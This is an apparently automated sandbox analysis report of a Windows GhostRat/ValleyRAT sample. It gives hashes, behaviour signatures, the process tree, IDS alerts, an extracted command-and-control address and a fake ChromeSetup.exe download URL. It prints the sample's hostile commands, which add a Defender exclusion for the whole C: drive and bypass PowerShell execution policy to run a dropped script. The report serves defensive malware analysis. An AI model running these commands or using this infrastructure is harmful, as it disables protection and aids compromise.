Windows Analysis Report
FIWszl1A8l.exe

Overview

General Information

Sample name: FIWszl1A8l.exe (renamed because original name is a hash value)
Original sample name: f1c0a349ef488c9d2fde3dd7f3c497bd.exe
Analysis ID: 1587335
MD5: f1c0a349ef488c9d2fde3dd7f3c497bd
SHA1: 20eb1d3d000be4d3c06c88a54eeb57fb01b054d5
SHA256: 38e825894f85ed654a2badb58f28b334597d2662952d9a5ec6918bd8c8b7335a
Tags: exe, ValleyRAT, user-abuse_ch

Detection

GhostRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • FIWszl1A8l.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\FIWszl1A8l.exe" MD5: F1C0A349EF488C9D2FDE3DD7F3C497BD)
    • cmd.exe (PID: 7628 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7680 cmdline: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • WmiPrvSE.exe (PID: 7792 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • FIWszl1A8l.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Roaming\FIWszl1A8l.exe" MD5: F1C0A349EF488C9D2FDE3DD7F3C497BD)
      • cmd.exe (PID: 2416 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7604 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 2452 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7648 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 7924 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7980 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 8076 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8120 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
{"C2 url": "8.217.85.20:9093"}
Source | Rule | Description | Author | Strings
00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000006.00000003.2570644353.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000006.00000003.3537866824.0000000004173000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000006.00000003.1775024265.0000000004111000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |

Source | Rule | Description | Author | Strings
6.2.FIWszl1A8l.exe.27e1004.2.raw.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
6.2.FIWszl1A8l.exe.43105eb.6.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
6.3.FIWszl1A8l.exe.41b486b.4.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
6.2.FIWszl1A8l.exe.28205bf.3.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
6.2.FIWszl1A8l.exe.27e1004.2.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |

                      System Summary

                      Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\FIWszl1A8l.exe", ParentImage: C:\Users\user\Desktop\FIWszl1A8l.exe, ParentProcessId: 7528, ParentProcessName: FIWszl1A8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7628, ProcessName: cmd.exe
                      Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\FIWszl1A8l.exe", ParentImage: C:\Users\user\Desktop\FIWszl1A8l.exe, ParentProcessId: 7528, ParentProcessName: FIWszl1A8l.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ProcessId: 8076, ProcessName: cmd.exe
                      Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8076, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ProcessId: 8120, ProcessName: powershell.exe
                      Source: Process started, Author: frack113: Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7680, ProcessName: powershell.exe
                      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7628, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7680, ProcessName: powershell.exe
                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2025-01-10T07:52:36.994962+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.9 | 49931 | 8.217.85.20 | 9091 | TCP
                      2025-01-10T07:54:11.167711+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.9 | 49984 | 8.217.85.20 | 9092 | TCP
                      2025-01-10T07:55:51.459265+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.9 | 49986 | 8.217.85.20 | 9092 | TCP

                      AV Detection

                      Source: 6.2.FIWszl1A8l.exe.28205bf.3.raw.unpack, Malware Configuration Extractor: GhostRat {"C2 url": "8.217.85.20:9093"}
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, ReversingLabs: Detection: 31%
                      Source: FIWszl1A8l.exe, Virustotal: Detection: 45%
                      Source: FIWszl1A8l.exe, ReversingLabs: Detection: 31%
                      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability

                      Compliance

                      Source: C:\Users\user\Desktop\FIWszl1A8l.exe, Unpacked PE file: 0.2.FIWszl1A8l.exe.400000.0.unpack
                      Source: FIWszl1A8l.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknown, HTTPS traffic detected: 47.79.66.76:443 -> 192.168.2.9:49751 version: TLS 1.2
                      Source: FIWszl1A8l.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: UpdaterSetup.exe.pdb source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbBQ source: powershell.exe, 0000000D.00000002.1442464615.0000000006FC5000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 0000000D.00000002.1442901248.0000000007013000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1416194201.0000000002A77000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb source: FIWszl1A8l.exe, FIWszl1A8l.exe, 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, FIWszl1A8l.exe, 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: FIWszl1A8l.exe, 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, FIWszl1A8l.exe, 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbl source: powershell.exe, 0000000D.00000002.1442901248.0000000007013000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: UpdaterSetup.exe.pdbP source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: Binary string: updater.exe.pdb source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: Binary string: updater.exe.pdbP source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.dr
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: z:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: x:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: v:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: t:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: r:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: p:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: n:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: l:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: j:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: h:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: f:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: b:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: y:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: w:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: u:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: s:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: q:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: o:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: m:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: k:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: i:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: g:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: e:
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: c:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, File opened: [:
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe, Code function: 6_2_02D080F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,6_2_02D080F0

                      Networking

                      Source: Network traffic, Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.9:49931 -> 8.217.85.20:9091
                      Source: Network traffic, Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.9:49984 -> 8.217.85.20:9092
                      Source: Network traffic, Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.9:49986 -> 8.217.85.20:9092
                      Source: Malware configuration extractor, URLs: 8.217.85.20:9093
                      Source: global traffic, TCP traffic: 8.217.85.20 ports 18852,8853,9092,3,5,9091,8
                      Source: global traffic, TCP traffic: 192.168.2.9:49715 -> 8.217.85.20:8853
                      Source: Joe Sandbox View, ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                      Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: unknown, TCP traffic detected without corresponding DNS query: 8.217.85.20
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exe, Code function: 0_2_10002090 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,WaitForSingleObject,CoInitializeEx,CoCreateInstance,Sleep,Sleep,exit,0_2_10002090
                      Source: global traffic, HTTP traffic detected: GET /ChromeSetup.exe HTTP/1.1 User-Agent: URLDownloader Host: jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com Cache-Control: no-cache
                      Source: global traffic, DNS traffic detected: DNS query: jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com
                      Source: powershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000004.00000002.1352573033.0000000004726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004F27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000004.00000002.1352573033.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1420200807.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1648793424.0000000004314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000004.00000002.1352573033.0000000004726000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004F27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://support.google.com/installer/
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://support.google.com/installer/%s?product=%s&error=%d
                      Source: powershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: powershell.exe, 00000004.00000002.1352573033.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000004911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1420200807.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1648793424.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1648793424.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://clients2.google.com/cr/report
                      Source: powershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://crashpad.chromium.org/
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://crashpad.chromium.org/bug/new
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://dl.google.com/update2/installers/icons/
                      Source: powershell.exe, 00000013.00000002.1657270156.0000000004A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000000A.00000002.1392284499.0000000005223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.00000000050E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1392284499.0000000005043000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.000000000529C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1657270156.00000000050AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/
                      Source: FIWszl1A8l.exe, 00000000.00000002.1733549157.0000000000400000.00000040.00000001.01000000.00000003.sdmp, FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, FIWszl1A8l.exe, 00000006.00000002.3781678272.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exe
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exe3E(
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exeZ
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exeg
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exetB
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jdoigshetligsndglsdrjktg.oss-cn-hongkong.aliyuncs.com/ChromeSetup.exexC
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://m.google.com/devicemanagement/data/api
                      Source: powershell.exe, 00000004.00000002.1356459970.000000000563C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403002958.000000000597C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1437685680.000000000568D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1674897205.00000000059A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://update.googleapis.com/service/update2/json
                      Source: ChromeSetup[1].exe.0.dr, ChromeSetup.exe.0.drString found in binary or memory: https://update.googleapis.com/service/update2/jsonhttps://clients2.google.com/cr/reporthttps://m.goo
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: https://www.innosetup.com/
                      Source: FIWszl1A8l.exe, FIWszl1A8l.exe.0.drString found in binary or memory: https://www.remobjects.com/ps
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownHTTPS traffic detected: 47.79.66.76:443 -> 192.168.2.9:49751 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

